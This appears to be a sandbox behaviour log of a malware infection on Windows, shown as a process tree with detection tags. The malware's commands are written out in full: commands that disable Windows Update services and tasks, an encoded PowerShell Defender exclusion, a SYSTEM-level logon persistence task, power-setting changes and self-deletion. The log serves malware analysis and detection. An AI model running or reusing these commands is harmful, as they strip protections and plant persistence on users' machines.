"HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE9⤵PID:3788
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:3832
-
C:\Windows\system32\sc.exesc stop wuauserv10⤵
- Launches sc.exe
PID:392 -
C:\Windows\system32\sc.exesc stop bits10⤵
- Launches sc.exe
PID:2996 -
C:\Windows\system32\sc.exesc stop dosvc10⤵
- Launches sc.exe
PID:1856 -
C:\Windows\system32\sc.exesc stop UsoSvc10⤵
- Launches sc.exe
PID:740 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc10⤵
- Launches sc.exe
PID:4528 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:4808 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:1984 -
C:\Windows\system32\sc.exesc config bits start= disabled10⤵
- Launches sc.exe
PID:5032 -
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""10⤵
- Launches sc.exe
PID:4508 -
C:\Windows\system32\sc.exesc config dosvc start= disabled10⤵
- Launches sc.exe
PID:4900 -
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:2356 -
C:\Windows\system32\sc.exesc config UsoSvc start= disabled10⤵
- Launches sc.exe
PID:4256 -
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:3296 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:3972 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:3376 -
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1092 -
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3996 -
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f10⤵PID:920
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f10⤵PID:1196
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f10⤵PID:2284
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f10⤵PID:2248
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f10⤵PID:1804
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f10⤵PID:1208
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE10⤵PID:4964
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE10⤵PID:2336
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE10⤵PID:3060
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE10⤵PID:3680
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE10⤵PID:5072
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE10⤵PID:2608
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE10⤵PID:3972
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 09⤵
- Power Settings
PID:380 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:1608 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 010⤵
- Power Settings
PID:4840 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 010⤵
- Power Settings
PID:3600 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 010⤵
- Power Settings
PID:4248 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 010⤵
- Power Settings
PID:2736 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe9⤵PID:2500
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"10⤵PID:216
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"6⤵PID:1820
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:3392 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:4428
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="6⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
PID:1656 -
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
PID:1048 -
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
PID:3856 -
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
PID:3048 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:2400 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
- Launches sc.exe
PID:4736 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
- Launches sc.exe
PID:1076 -
C:\Windows\system32\sc.exesc config bits start= disabled7⤵
- Launches sc.exe
PID:1932 -
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""7⤵
- Launches sc.exe
PID:3428 -
C:\Windows\system32\sc.exesc config dosvc start= disabled7⤵
- Launches sc.exe
PID:2572 -
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""7⤵
- Launches sc.exe
PID:4900 -
C:\Windows\system32\sc.exesc config UsoSvc start= disabled7⤵
- Launches sc.exe
PID:1564 -
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""7⤵
- Launches sc.exe
PID:1632 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
- Launches sc.exe
PID:1424 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
- Launches sc.exe
PID:4168 -
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1208 -
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4016 -
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f7⤵PID:1760
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f7⤵PID:1076
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵PID:2888
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵PID:3360
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵PID:2012
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵PID:4092
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE7⤵PID:2552
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE7⤵PID:4292
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE7⤵PID:4848
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE7⤵PID:4604
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE7⤵PID:1220
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE7⤵PID:3232
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵PID:4468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
- Power Settings
PID:1472 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2248 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4036 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:880 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:228 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Drops file in Windows directory
PID:4808 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"6⤵PID:4740
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:4256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"6⤵PID:4092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:2332 -
C:\Users\Admin\Chrome\updater.exeC:\Users\Admin\Chrome\updater.exe7⤵
- Executes dropped EXE
PID:1328 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"8⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4168 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="9⤵PID:2664
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:3936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4528 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE9⤵PID:3012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:4848 -
C:\Windows\system32\sc.exesc stop wuauserv10⤵
- Launches sc.exe
PID:3024 -
C:\Windows\system32\sc.exesc stop bits10⤵
- Launches sc.exe
PID:4672 -
C:\Windows\system32\sc.exesc stop dosvc10⤵
- Launches sc.exe
PID:3268 -
C:\Windows\system32\sc.exesc stop UsoSvc10⤵
- Launches sc.exe
PID:3056 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc10⤵
- Launches sc.exe
PID:1808 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:2988 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:4472 -
C:\Windows\system32\sc.exesc config bits start= disabled10⤵
- Launches sc.exe
PID:1736 -
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""10⤵
- Launches sc.exe
PID:216 -
C:\Windows\system32\sc.exesc config dosvc start= disabled10⤵
- Launches sc.exe
PID:4808 -
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:2224 -
C:\Windows\system32\sc.exesc config UsoSvc start= disabled10⤵
- Launches sc.exe
PID:4864 -
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""10⤵
- Launches sc.exe
PID:5060 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled10⤵
- Launches sc.exe
PID:952 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""10⤵
- Launches sc.exe
PID:4896 -
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2608 -
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3880 -
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f10⤵PID:1616
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f10⤵PID:1776
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f10⤵PID:5060
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f10⤵PID:3060
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f10⤵PID:4156
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f10⤵PID:4432
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE10⤵PID:2768
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE10⤵PID:3884
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE10⤵PID:4820
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE10⤵PID:1932
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE10⤵PID:1648
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE10⤵PID:1060
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE10⤵PID:1616
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 09⤵
- Power Settings
PID:3624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:464 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2212 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2400 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1076 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 010⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe9⤵PID:2492
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"10⤵PID:3556
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"6⤵PID:1352
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:4516 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:464
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\explorer.exeC:\Users\Admin\AppData\Local\Temp\explorer.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:628
-
